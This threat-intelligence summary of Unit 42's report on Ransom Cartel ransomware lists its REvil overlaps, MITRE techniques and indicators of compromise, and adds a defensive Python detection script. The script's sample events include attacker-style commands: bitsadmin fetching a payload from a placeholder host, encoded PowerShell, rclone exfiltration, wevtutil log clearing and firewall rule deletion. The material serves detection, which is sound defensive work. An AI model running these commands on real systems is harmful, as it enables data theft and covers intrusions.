Ransom Cartel Ransomware: A Possible Connection With REvil

Ransom Cartel emerged as a ransomware-as-a-service operation around late 2021, showing double-extortion techniques and notable overlaps with REvil, including possible ties to REvil’s code and infrastructure. The report analyzes Ransom Cartel’s TTPs, comparisons to REvil, its TOR-based victim site, and the potential links between the groups, based on sample analyses and observed behaviors. #RansomCartel #REvil #DonPAPI #LaZagne

Keypoints

  • Ransom Cartel surfaced mid-December 2021 as a RaaS operation employing double extortion with overlaps to REvil and potential ties to the disappeared REvil operation.
  • Multiple redirect events and a name-and-shame blog linked to REvil were observed, fueling discussion about whether the new operation reused REvil code or was a separate entity with REvil influence.
  • Ransom Cartel has targeted education, manufacturing, and utilities/energy sectors, with early victims in the U.S. and France, and uses compromised credentials and initial access brokers to gain access.
  • DonPAPI, LaZagne, and Mimikatz are used to harvest credentials; SSH is enabled on ESXi devices to maintain persistence, with new root-like accounts created for access.
  • The attackers leverage PDQ Inventory as a remote access tool and encrypt VMware ESXi environments by enumerating VMs and encrypting ESXi-related files, leveraging Salsa20/AES and Curve25519 for encryption and session secrets.
  • Ransom notes, a TOR-based site, and a heavily analyzed cryptographic and configuration scheme show strong code overlaps with REvil, including similar session-secret workflows and file-encryption structures.
  • Palo Alto Networks Unit 42 notes that Ransom Cartel shares several tactics with REvil and that the operation’s breadth and persistence suggest continued activity and evolution.

MITRE Techniques

  • [T1078] Valid Accounts – Uses legitimate VPN, RDP, Citrix or VNC credentials to maintain access to an environment.
  • [T1133] External Remote Services – Uses legitimate VPN or Citrix credentials to maintain access to an environment.
  • [T1072] Software Deployment Tools – Deploys the PDQ Inventory Scanner tool.
  • [T1059.001] Command and Scripting Interpreter: PowerShell – Uses PowerShell to retrieve the malicious payload and download additional resources such as Mimikatz and Rclone.
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Uses cmd.exe to execute commands.
  • [T1003.008] OS Credential Dumping: /etc/passwd and /etc/shadow – Attempts to dump the contents of /etc/passwd and /etc/shadow to enable offline password cracking.
  • [T1098] Account Manipulation – Creates new user accounts and adds them to the administrators group to maintain elevated access.
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder – Adds registry run keys to achieve persistence. In some cases the following command was observed: start cmd.exe /k runonce.exe /AlternateShellStartup.
  • [T1197] BITS Jobs – Uses BITSAdmin to download and install payloads.
  • [T1068] Exploitation for Privilege Escalation – Exploits the PrintNightmare vulnerability.
  • [T1222.002] File and Directory Permissions Modification: Linux and Mac – Uses the chmod +x command to grant executable permissions to the ransomware.
  • [T1112] Modify Registry – Modifies the Registry to disable UAC remote restrictions by setting SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy to 1.
  • [T1070.001] Indicator Removal on Host: Clear Windows Event Logs – Uses wevtutil to clear the Windows event logs.
  • [T1218.011] System Binary Proxy Execution: Rundll32 – Uses Rundll32 to load and execute a malicious DLL.
  • [T1562.004] Impair Defenses: Disable or Modify System Firewall – Deletes rules in the Windows Defender Firewall exception list related to AnyDesk.
  • [T1070.004] Indicator Removal on Host: File Deletion – Deletes some of the files used during operations as part of cleanup, including removing applications such as 7z.exe, tor.exe and ssh.exe.
  • [T1070.003] Indicator Removal on Host: Clear Command History – Clears the Windows PowerShell and WitnessClientAdmin log files.
  • [T1027] Obfuscated Files or Information – Uses encoded PowerShell commands.
  • [T1003.001] OS Credential Dumping: LSASS Memory – Uses Mimikatz to harvest credentials.
  • [T1555.003] Credentials from Web Browsers – Compromises users’ saved passwords from browsers.
  • [T1046] Network Service Discovery – Uses PDQ Inventory scanner, Advanced Port Scanner and netscan to discover services (netscan also scanned for the ProxyShell vulnerability).
  • [T1083] File and Directory Discovery – Searches for specific files prior to encryption.
  • [T1135] Network Share Discovery – Enumerates remote open SMB network shares.
  • [T1087.001] Account Discovery: Local Account – Accesses ntuser.dat and /etc/passwd to enumerate all accounts.
  • [T1021.004] Remote Services: SSH – Uses PuTTY for remote access.
  • [T1550.002] Use Alternate Authentication Material: Pass the Hash – Dumps password hashes for use in pass-the-hash authentication attacks.
  • [T1021.001] Remote Services: Remote Desktop Protocol – Uses RDP for lateral movement.
  • [T1560.001] Archive Collected Data: Archive via Utility – Uses 7-Zip to compress stolen data for exfiltration.
  • [T1567.002] Exfiltration Over Web Service: Exfiltration to Cloud Storage – Uses Rclone to exfiltrate data to cloud sharing websites (such as pCloud and MegaSync).
  • [T1219] Remote Access Software – Uses AnyDesk to remotely connect and transfer files.
  • [T1090.003] Proxy: Multi-hop Proxy – Routes traffic over TOR and VPN servers to obfuscate activity.
  • [T1105] Ingress Tool Transfer – Downloads and uploads files to and from the victim’s machine.
  • [T1486] Data Encrypted for Impact – Encrypts system data and adds a random extension to encrypted files. The following extensions have been observed: .zmi5z, .nwixz, .ext, .zje2m, .5vm8t, .m4tzt.
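As an added defender-side example (not code from the Unit 42 report), the Python script below checks process-creation events against command-line patterns for several of the techniques listed above: the runonce.exe /AlternateShellStartup run key, the LocalAccountTokenFilterPolicy change, wevtutil log clearing, BITSAdmin transfers, encoded PowerShell, Rclone exfiltration and the AnyDesk firewall rule deletion. The host names, the sample command lines and the use of reg add syntax for the registry change are constructed assumptions.

```python
import re

# Command-line patterns for the TTPs summarised above. The rule set and the
# events below are constructed for this example, not taken from the report.
RULES = [
    ("T1547.001 runonce /AlternateShellStartup persistence",
     re.compile(r"runonce\.exe\s+/AlternateShellStartup", re.I)),
    ("T1112 LocalAccountTokenFilterPolicy set to 1 (assumes reg add syntax)",
     re.compile(r"LocalAccountTokenFilterPolicy\b.*\s/d\s+0*1\b", re.I)),
    ("T1070.001 wevtutil event log clearing",
     re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b", re.I)),
    ("T1197 BITSAdmin transfer",
     re.compile(r"\bbitsadmin(\.exe)?\b.*/(transfer|addfile)\b", re.I)),
    ("T1027 encoded PowerShell command",
     re.compile(r"powershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("T1567.002 rclone copy to remote",
     re.compile(r"\brclone(\.exe)?\s+(copy|sync|move)\b", re.I)),
    ("T1562.004 AnyDesk firewall rule deletion",
     re.compile(r"\bnetsh\b.*advfirewall.*delete\s+rule.*anydesk", re.I)),
]

SAMPLE_EVENTS = [  # constructed process-creation events: (host, command line)
    ("ws01", "start cmd.exe /k runonce.exe /AlternateShellStartup"),
    ("ws01", r"reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
             r" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f"),
    ("srv02", "wevtutil cl Security"),
    ("srv02", r"bitsadmin /transfer job /download http://placeholder.invalid/a.exe C:\Users\Public\a.exe"),
    ("srv02", "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAA="),
    ("srv03", r"rclone.exe copy D:\Finance remote:backup --transfers 8"),
    ("srv03", 'netsh advfirewall firewall delete rule name="AnyDesk"'),
    ("ws09", "wevtutil qe Application /c:5"),                   # benign query: must not fire
    ("ws09", r"powershell.exe -File C:\scripts\inventory.ps1"),  # benign script run: must not fire
]

def scan_events(events):
    """Return one (rule_name, host, command_line) tuple per rule that matches an event."""
    hits = []
    for host, cmd in events:
        for name, pattern in RULES:
            if pattern.search(cmd):
                hits.append((name, host, cmd))
    return hits

def hosts_by_hit_count(hits):
    """Rank hosts by the number of distinct techniques that fired on them, for triage."""
    seen = {}
    for name, host, _ in hits:
        seen.setdefault(host, set()).add(name)
    return sorted(((h, len(n)) for h, n in seen.items()), key=lambda i: (-i[1], i[0]))
```

Running scan_events(SAMPLE_EVENTS) flags the seven constructed attacker commands and leaves the two benign ws09 commands alone; hosts_by_hit_count then puts srv02 first because three different techniques fired there.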

Indicators of Compromise

  • [File Hashes] – 9935DA29F3E4E503E4A4712379CCD9963A730CCC304C2FEC31E8276DB35E82E8, BF93B029CCA0DE4B6F32E98AEEBD8FD690964816978A0EB13A085A80D4B6BF4E (and 2 more hashes)
  • [Network-based IoCs] – 185.239.222[.]240 TOR Exit Node, 108.62.103[.]193 TOR Exit Node, 185.129.62[.]62 TOR Exit Node, 185.143.223[.]13 Bulletproof hosting server, 185.253.163[.]23 PIA VPN exit node (and 3 more TOR exit nodes)
  • [Onion Domains] – dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd[.]onion, aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd[.]onion, blogxxu75w63ujqarv476otld7cyjkq4yoswzt4ijadkjwvg3vrvd5yd[.]onion/Blog

Read more: https://unit42.paloaltonetworks.com/ransom-cartel-ransomware/?web_view=true